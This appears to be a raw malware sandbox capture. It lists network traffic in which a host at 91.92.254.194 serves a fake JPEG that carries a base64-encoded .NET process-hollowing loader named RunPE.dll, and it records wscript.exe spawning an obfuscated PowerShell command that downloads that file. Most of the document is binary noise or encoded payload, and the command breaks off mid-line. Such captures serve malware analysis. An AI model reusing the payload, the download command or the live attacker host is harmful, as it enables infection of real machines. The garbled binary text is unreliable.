Data received | u«:+rü-^ùôqâzM«¢Àáú÷ãà, ê,_ç.¡C´3#,«ðÃÜeôH( ®pÄâvª÷ÿ \b²d U} õßúãSy#bÇf®?ZÅ+ AÀ¼ öÆÊÀB}(2¥kô¬ÄÕé}Gõçnö þ2µ:{'¦§¦bϬGâávVSv{)´|ò>+¢ö¤Óÿ `{o³µ=NWOâ eêî3èZOÚÙíL&O¾,d.æ Ågç¤qÝpRÄëàßìßhÿ jþ§ £ðËÔHGâªPsãþ3ö]ã3´XÑo%²¤Þ9¼¨pHizç¨û=öZ]dªò)ÛwÈÀ_À>Ïͬ] >tÚetÒx|z-:¢(2¸³ÎgÊÜj³B~ù7|gaÀ±Ù}¹üµ`|3>`s̵C¾.è$áe>Ý°.Yc R¢XüGùá!m±ñ7Ó;s@G- »ºî;p.M·Ã(ë}9Ë?g*MuÀ«¶Åü'xåH9!Û4FsÅ`AÜ+( í-¹«._jÐçÅë8Z¨©ÝóÎr2¨ß¶^@± 5¹l´Ò¡!²ÃúØ÷x¥Vëý0±»£7¹î'¨¶¥XÑ=0B ³i^¹C:«j£ØàÖ@àO8'Úɾt¾B2 G 8 DÜíÎðE¬®áTGç¼Ò9ÛY¡@ {`U¶SR×ÓÓÀ)î1WmÏ\ UçåûÌYX^ø°FÓG03¸|O¾_{áh÷Ó1 ¼áO,{×loÕxüG§! ¶&ÍvÁ>Ù\Þ,Wl´º©y*þ($R̤¬m/±ÀÀ¬ÉV~ùDUIKsønòâpÃ¥±, A6À¦Ñ·6ï-þÁùÊG¾[PÌî }B¡ Ð<ÕP¬í¹@.ÙuVn_|´±ùp«¯IMí#®³mR§èpN0Ð9 ß&-#ùêç¸ 5ê 9]b>Óu/hÌE5P8ä |
Data received | Íõ¼ý3¯ðßû]öz8µÒê Yc´ñÚÚÖÿ ¾å 7ê&MäÆøh×>©á¿°¨¼[Á´ZíOÏ¥ÔÎIbm8%ÓDÞàk~äü?ì΢o·Z³óãTbeà¤?UIÖÅuÍÿ Ú÷íW©ñ]OÙï Òi\,ÓDå^g^ªHä*±"p}°=oÚÙì_mV ÿ k |
Data received | EAAAALAAAAAAAHAAEAAAAAAAYAKQAwAAYAXAAwAAYAcAEwAAYA0wEwAAYAHgIwAAYAJgIwAAYALAI4AgoASAJZAgYAcgJ3AgYAiQIwAAYAkAI4AgYApQJ3AgoA8QJZAgoAewNZAgYA7wMwAAYADQUUBQYAJQUUBQYAPgUwAAYARQUwAAYAVgVhBQYAcwUwAAYAeAVhBQYAqwUwAAYAvQUwAAYAJAYwAAYAOwYwAAYATQZVBgYAkgYwAA4AmwanBgYAAQcwAAYABwcwAAYAGAcwAAYAJwcwAAYAegcUBQYA0AdhBQYA6QdhBQYA/QkwAAYACgowAAYAsQowAAoAGwwlDAYARgxPDAYAawwwAAoAwQwlDAoA1gwlDAYAew0wAAYAtxzXHAYA9xzXHAYAFR1ZAsMAKR0AAAYAOB1hBQYATx1hBQYAbB1hBQYAix1hBQYApB1hBQYAvR1hBQYA2B1hBQYA8x1VBgYABx5VBgYAFR5hBQ4AMh6nBgAAAAARAAAAAAABAAEAAAAQABoAIQAFAAEABAAAARAAQAABAAUAAgATAAMBAABHAAAACQAOADUAAwEAAG4AAAAJAA4AOQADAQAAjAAAAAkADgA9AAMBAAClAAAACQAOAEEAAwEAAMMAAAAJAA4ARQADAQAA3AAAAAkADgBJAAMBAADzAAAACQAOAE0AAwEAAA4BAAAJAA4AUQADAQAAKAEAAAkADgBVAAIBAABFAQAACQAOAFkACgEQAFwBAAANAA4AXQAKARAAegEAAA0AEgBdAAAAEACOAQEABQAkAF0AAAEQAJMBAAAFACUAbAATAPIBDgAxACkEDgAxADYEDgAxAEwEDgAxAF0EDgAxAHMEDgAxAIQEDgAxAJMEDgAxAKYEDgAxALgEDgA2AM0EDgAWANwElQARAOAEDgAGAAILnAEGABALnAEGAB0LLQMGACcLLQMGADALlQAGADMLpgAGAD4LpgAGAEgLpgAGAFALlQAGAFQLlQAGAFgLlQAGAGALlQAGAGgLlQAGAHYLlQAGAIQLlQAGAJQLlQAGAJwLMAMGAKgLMAMGALQLlQAGAMALlQAGAMoLlQAGANULlQATAN8LDgADAOoNlQADAA0OlQADADAOlQADAFMOlQADAHYOlQADAJkOlQADALwOlQADAN8OlQADAAIPlQADACUPlQADAEgPlQADAGsPlQADAI4PlQADALEPlQADANQPlQADAPcPlQADABoQlQADAD0QlQADAGAQlQADAIMQlQADAKYQlQADAMkQlQADAOwQlQADAA8RlQADADIRlQADAFURlQADAHgRlQADAJsRlQADAL4RlQADAOERlQADAAQSlQADACcSlQADAEoSlQADAG0SlQADAJASlQADALMSlQADANYSlQADAPkSlQADABwTlQADAD8TlQADAGITlQADAIUTlQADAKgTlQADAMsTlQADAO4TlQADABEUlQADADQUlQADAFcUlQADAHoUlQADAJ0UlQADAMAUlQADAOMUlQADAAYVlQADACkVlQADAEwVlQADAG8VlQADAJIVlQADALUVlQADANgVlQADAPsVlQADAB4WlQADAEEWlQADAGQWlQADAIcWlQADAKoWlQADAM0WlQADAPAWlQADABMXlQADADYXlQADAFkXlQADAHwXlQATAJ8XmAMDAMIXlQADAOUXlQADAAgYlQADACsYlQADAE4YlQADAHEYlQADAJQYlQADALcYlQADANoYlQADAP0YlQADACAZlQADAEMZlQADAGYZlQADAIkZlQADAKwZlQADAM8ZlQADAPIZlQADABUalQADADgalQADAFsalQADAH4alQADAKEalQADAMQalQADAOcalQADAAoblQADAC0blQADAFAblQADAHMblQADAJYblQADALkblQADANwblQADAP8blQADACIclQARAEUcmANQIAAAAACTAMIBCgABAFQgAAAAAJEY2AEKAAEAXCAAAAAAkwDfAQoAAQBkIAAAAACWAAUCEQABACgjAAAAAIYYbAIjAAMAdCMAAAAAkwCxAjoAAwCEIwAAAACTAMsCOgADAJQjAAAAAJMA3gJAAAMApCMAAAAAkwAUAxEAAwC0IwAAAACTADQDUgADAMgjAAAAAJMARwMRAAMA2CMAAAAAkwBoA2AAAwDkIwAAAACTAIMDbAADAPAjAAAAAJMAogNxAAMABCQAAAAAkwDAA38AAwAYJAAAAACTANwDbAADACQkAAAAAJMAAwSMAAMAMCQAAAAAkwAWBJAAAwA4JAAAAACWAPMEmAADAFAmAAAAAJYACAVsAAUAoCcAAAAAlgBPBWwABgCQKQAAAACWAIYF2wAHAAAAAACAAJEg0wX8AA4AAAAAAIAAkSDuBQIBDwAQLQAAAACRAAYGCQERAEgtAAAAAJEA9wY/ARMAgDsAAAAAhhhsAiMAGgDMOwAAAACRGNgBCgAaALg9AAAAAJMAQQeMABoAxD0AAAAAkwBUB9EBGgDMPQAAAACTAGcH1gEaANw9AAAAAJMAmwdgABoA6D0AAAAAkwC9B2AAGgD0PQAAAACTAPcHUgAaAAg+AAAAAJMAEQj4ARoAFD4AAAAAkwAyCFIAGgAoPgAAAACTAEUIGQEaADQ+AAAAAJMAWAj9ARoAQD4AAAAAkwByCAMCGgBMPgAAAACTAJAIDAIaAFw+AAAAAJMAowiRARoAZD4AAAAAkwC2CBICGgB4PgAAAACTANAIEgIbAIw+AAAAAJMA4wgZAhwAoD4AAAAAkwAKCSACHgDAPgAAAACTAEAJKgIjANA+AAAAAJMAWwk3AiMA3D4AAAAAkwB3CRICIwDwPgAAAACTAIoJEgIkAAQ/AAAAAJMAnQlCAiUAFD8AAAAAkwCwCTcCJgAgPwAAAACTANIJbAAmAAAAAAADAIYYbAKxACYAAAAAAAMAxgEKCE4CKAAAAAAAAwDGAfEJUwIpAAAAAAADAMYBIQpeAiwAAAAAAAMAhhhsArEALQAAAAAAAwDGAQoIZQIvAAAAAAADAMYB8QlsAjEAAAAAAAMAxgEhCnkCNQAAAAAAAw |
Data received | T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½*ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+庺°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû|O~GljmãmÔ`åÕQ|mès<ê1QÅ pOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®|W,oáò!p®¬ {àbl n1Ý3»D9³|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü? ]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ |è?\]&0ȱ±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2ͧ×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\*`tïd c ËyrÚ ÑàU':¢Á$_éðý襤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ*8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3Êà vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scb¹±.F¯¨Á$e% °*z® *IM±J .¯ÕD Ù 7Ᾰ}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒ*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑI Æûo|$vdì¤^bÓÀåå$éÅbmb» Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<Ë*H"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá*¤À Ùúaô˽É, íY£0Ë°úã:Wvu ÿ ¶mC»m`¬Êh s««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏE*áð¨ o?ÒS®Ô/ åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©DpÀfcÈùey¤!²:qÛ.È${úüº:Åy<¶;Y{ø¾X¶´7mç¿Ç%Í-,?±C6 |
Data received | ÁK0 ³£>áíæ6Ã(ùyb} nªßV<`Æ´]<J"6 m¥]Ö±iXÔP4}^ª?%òÎÇü=¸¯×ñ9ZyeÓP¹$üEÕðs+q? 6~ ÖáãúåSÖÃPñпO¶i<ãN&12ÄÂÃv£ÆQT)wñÏIáúBÆ|¢.$í}*L pÊçpóÚ§¹;¿¦=tðÕ_/ÍDÚJ°k#çéïÆÏÓ¶¢$)·qcf/Å]mö®ÿ Ë.ºªXw9!v<íÇNº$E(Þb1@ëêtÖÔj5*á:²G¶Ëà¾8$ý04uîP¤&¢zIÏ.¥*ý(Ì+ÜGê{=§ÂõwÍCµ÷ϧÉnGãóB0-©«r]«SVí×<Öyo¶þ!! õ=ó£K£aIqÚÔt¿óg6¶Î¨$©ÚyîyRù¾k)$HeP Q$}úd.N" Ú¥@KD£¿\Ób)¿1ÅI ¡úç6¬û0( &<ûÖ~ò<á%0¤UZ Ã,Å'^ÐzuøqÆ0³[VɯaùáÂX³(Ëü>®A#~=ð-¤ xý@ß c·=Fï7l«ºº ôL$«êw§VUDÿ ºoóÅôHC<6ö(ÈGfºù°a) ÜxoqYwJä²±P,åÃúeÎJB{ÎâçµPa_Bp~R{nÝÀíäïo=2b´Òµ´;|¨Q©M(ü@aïhî,æZ!zî8ù^F=ó;M+x>ãÛ~ðHÅcëí·ü8ö¢eÓB4Î%f@&º¨þ+÷é¢Ë4 ¹ÛÁ¸êzÝeuÈú!%w**hq@| ÀïHÂ4!yÏOQ þY'Tû·ÔÈhÕÙýo(«Ð$rÀn£ß.°«:¬r¸×©j:ûàwÃT²°bUúºßd¬h üÿ ¾10VÔÞpí㪠úÕb^;|°ðû;+B]í;lwø\ ×8y4ér úàH4íÿ /r±ã½ý/: _ÞZ<óÖtøÖ¦V`ÛÞ·-`ÿ ®PC-1;(H^?<¥pѱ5Èj£x@Þ{:Y5¸ÿ <yÜTK°m£]O7ý0qµ:]E÷Ã}Ü3!Vf íçÓÏOaÆîòÃU®åYFÖÛMê*þ@àHbMTjdY±?mócå¤%cdhÌåAæÈ =¿¡ï]{SU>N¢f%Ô.6ÙÜEõ?ûaæðæI"K+ÁxÊ«_u6wzûVºv!W«6æcwd×?Ú³GOâ'Ä'lX.àEE³D9ãÔèL ¥RÁ¤±f ñgboܾÃÞRDéûÃw`@õã ˤÓÇ ìðÍ¦× A|Æ!6 ®¦IiüÐhUO&¾8Yc-¡Ò*¬eeP8 ¬[ÕϾêãF¤H ¨ $jù`7áëçø±ó2°bÂV'>Âï0cLÆp¥Rn¨Tk4<2)4þ8²$¡!Ê/ 5} |ñöO«ÖG4bPÛd$ÉüJ¥¿ þp1õ-J±¯Ûf>Àöê3gÀüM6 uºD»Ø÷µì¿oE§ ¢ûËiM!RʺÀ ½ÝtïÔxz)Ói'ÔC$UÔ(«ÅrÏ?S.M.¬i4¤j¤´ÜBï$ÏÓéÿ r2:«K@|oS§XôPèN£ÍQë) G<I«>Øáð&ä)w@4N@r¼Y#¯ÇÐúiÖ5c´f` §Ï=/ìîuÑ}²ðI&ã8µÙÔ©?óÑM¦Èi¢¡VFÜìGR3KìDÒ'Ú¿x¿Ú0±u c"&°=OÛÿ j£_ ´³¤¡Ã]¨ñãùæí"Jàí`#®e#ÒGª+ý3Ï}¹J¿n§Iç:`ÈÈÅØh$Y»ûAñRº]~Ñj|WW * U÷æùÀÛâö3ìc»3+èÙP¥¨áZ°>òòUwµ'¸ÏyûCW³Ï°$[:iªßCå×>}H̶ \ Iw!Q¸t'F`Ut`Í\â ( ¬ ½Ök¯\ãrJ$ö{ÝéQs{¯' bM¥ ¯uaÏÏIMGuöÀ©];þÓFmF"©"¥\º¨Ù|ÐÜÀ±Lå¥BpµFBÖÁGð¡ùkø^ûäH»Pù1ìj÷ì~£#S§7Üç9g]ÇðeuùËü¿ðàHÛSÛ W%Ë5Ç3î¨Í~X}+·Ëv¬$SÒÚ÷øá¨AëíóXêJ°¼%¨VØõ´sõÀH¯¨ ß,w.ú«ÅýFK¾}òÈÎZÕ÷ºÀ~d-"° J2k:ûÞ*]A!GÇñΩÀf $¥«¨Rhc:];ùeNÞ0pñ¦áûÖ9§B³¦çù÷ÀdiÁéKbÓDë*ÖÛì0ð¼®Áç§l¡Phf8M;7m¾ã,tä>Ú_|$híå¾pÐFKlàDUºÆ¢Y®pâg6hãPe *ôÀXéʨlÐÐÆLaGQgõÉ£wEµ{3JÛ®9tìí¼RðÇßL¥õWKÂi´ãËç<A×mÑ`Eë éN¡Á¸ûeÄ'ïJk öø`&Ú6Y7"¯~#eꬼlD Ü_oÂêò4ʱ³«DÊ@ºä¶J(Eßs¡K`z°öÉ}>øXTcÞ°2ä$H*÷¿¦%& 6Ôæ²Á&áê¡u<¬Äd~X "»ª^xÎëAÈã¦mLĤè¹x´JA¾·ç9=~=²ÎÛMÇ{ïRh `D ûʱ ×^ÃÛ'U§ýädA;t¨ú_ûXCpËjôû3·5ù`aô»vÒ_Î/÷f2;lè>îF èFt»ÞZºÝØ_¾ºVF¢ß:P /uq?©xíU]0ÒÀk¤r<vãÏI§MÆqþ!0.ÑW}Æj¶E×=+ iÀSkõÀÉ0× ä ï@æéÁ5@Û8BTEqX ß#"¯kwËéô¢F4hß4!Ó¢*ék¦Ü1´Ñ¢U /õÀÇf@ÅZ=0Â&-fÊyþY£÷2Íܨ=ò_JØë µyü¶tH!Þ#Ü<m4ê¦Èà¼Å2]qÎDÚdYÍÛÀ߶ ôÀJ¤¥y<n®¹¥¦ ]UJ·IÃ˧gU%^xÀÈÕiÙt÷üKBý»fyÉ|õ¿u]æÆâLK[ D]ê+"°<ðûeßCé2ª<ñ¬<:?U£+X+Lç¨ÀÉJ¥² Õ`ÞhÁP»I$rsn- ê¢ZÊ3°p0åÓ4a@$.ðB+°)£×=E 9êpQiXüp1ÓB¤[i9 xõ Å}zæÒº±j±v¾7,°5É ÖH£GWkmÛ7ßs4,V")TnútýsPBh¨½²È½Á½9y!CÏJ<^-¯vJÆ |
Data received | Åüp2:î]nøÜä¶æE÷lÄ]$ôÍ]ì47ÐFgRjõªàÅÂ8óõÇ~03eðçPT#3©§§½ÜG¹È^v}óCÅgDâAv%ë}íMv®×}íQ *Ù×d×öÀFVVifº í^øD!;-w<qúÌ{á4ÐO+o Ô2Û |
Data received | reÜ@rÀ~XáÓ,IP·BÏ^ÇM@ín6r¾ÒHãA%Õ¨Ò`¥c;+Bñ¨NIê>\àt%$³8;{cÌj]r@¡Ç|¢·A+ÉÖt _r2#«ÛdS4åÉ Y'¯L$³oPñ½¨úä 0DÍVIJuúbæ7hCG¶UïbPÄmÈç¶V-Nô&ôµ}ëÛg¥!ýL¦þG:W åÃVŽð&åRJ }Åfý[8BªÃPË«Ù s^õjQc$áí-N²T\±åH åIbORo=7²Ä6aø®p+¢Ó±%O¸ÛÎç«è.Ev¾NkËá½»åÃÕ#-$jv=ð1*ùq!U H>øìð,JïÊ+Ê£åé¥E`cnÎ;à.K¯$±ß/«DTü1ÓM£ýáD#ÅdA¤Õ s¶úûq$¸ÈܹÃOy ÅåUyà,¦;£²01¢ÊâPÀÃ̺}GÒA! jä8¬Ç§½ð2#BeÜǶ«ëÍþU ¬ )QÞ³Ð:ødÁé§%Ú2¯OùrÙ|½4ªâàò!E~G8@#9Z$"î=bGè Y¡ ýèÔä(6¼ôâÏÓ=ølHÕ¥éºE$|ËuÓød$Ë¥ÔùÊÁóÕ¨ú0<ÑÓJ5. £m%= 89¿rÆ6JeàÝ=8#=LgÃ`BcÒNXöóT=êáÒÍ#Ìce,ÌJ±ßHßεAS¶ÆT¾å"ì欺8»ù{ÎI.R -ÏN½òáòF3¥&aÓ©N<` [iø¼@Ì.|2ɸ±ºúãÚ J O~Æ TOP/P¡¹` (|AËUf7zX®ÙEF¸=ñçÓF)ÅfYj sBÅà]£ ¡Õ·)$)<+ûæç éFáUd¬j¥m,Ü yâ·5ü9¥ÔǸ+iä;rÝVÔíÍo 4ú]SÈI;+DÄ0Z=04ü?O¦û³ê^}4*!,ÛHc´2¯EcDï=Hù7øWß<J´h6±RXfUw꿦9àë¼Z!§ h Ûµ÷UuܬmUWÕj¤³¶»g¿OÐÁK¤ÐysÂVäCrv_a\ð8Àù§ia0ñjVa+2ë·k ¶Aöõqßà0ì-øf×±a«]&¥ ¦%dRTøô=ÖxF·KÔè7NWÖË"±¿düO8¦£À|6mvâðé]¡e´ÔD̤ÏûcÏV7Í÷8ÓǯÅ$ OÝ÷0Rh »ºr[±ìÇæqɤÒ"¦@vÈ´Á±Èo{û5àÚ--Ò HB¤lÌ Ùè:~yáÖn1¢pcQÐÕO>ø(ÈÌ V³Òýºá7/¨Ê°tºjdz1 ª¦Îé¢V¦F Ó½ÿ )Ûß ¤ÒÇ:9w Ê8×5<I´¯¡ 4m'põÙ¬Á[¼ÙµUÛ+gmרÎ$²låÜÔ:+ ÒB¥PÞ¦$à îpòigIRÑ[Üå#R໨{XÀ¢©PX©¢2Ê°e'ñ(t;¦ ½BøÌx×ÌeD¦406|(¦²EÐjµz´!&AÜÊ%¤¨ ÁePMt'§QôÏ°>¡ðÿ Ú¯E ñÖà 6h·!e פ¶ç}GqcæáúßÖÔi³ÆÉL-Få 0£×A÷Ï¥ý_íoÁ$-0U£&D0«;DÑ%y¾}Gxö¦Oö×Æ)w»kæ/WÁ.Ö9øç`XAØÈzí³íïjíÇÍù±lÎZª1$Qö$¦yEÒM"±@Q»§Q"-1ÒÆQü5UFSe¯ãÝv0¾gÍǶO0û4Û@.Û½ÎÓè§Ôå$HçÆzVÏ |
Data received | 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 |
Data received | BDAG8AcAB5AHIAaQBnAGgAdAAAAEMAbwBwAHkAcgBpAGcAaAB0ACAAqQAgACAAMgAwADIANAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAPAAKAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAFIAdQBuAFAARQAuAGQAbABsAAAALAAGAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAABSAHUAbgBQAEUAAAA0AAgAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAOAAIAAEAQQBzAHMAZQBtAGIAbAB5ACAAVgBlAHIAcwBpAG8AbgAAADEALgAwAC4AMAAuADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJAAAAwAAABAMQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=<<BASE64_END>> |
Data sent | GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 Connection: Keep-Alive |
Data sent | GET /imge/new-image_v.jpg HTTP/1.1 Host: 91.92.254.194 |
host | 91.92.254.14 | |||
host | 91.92.254.194 |
parent_process | wscript.exe | martian_process | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = 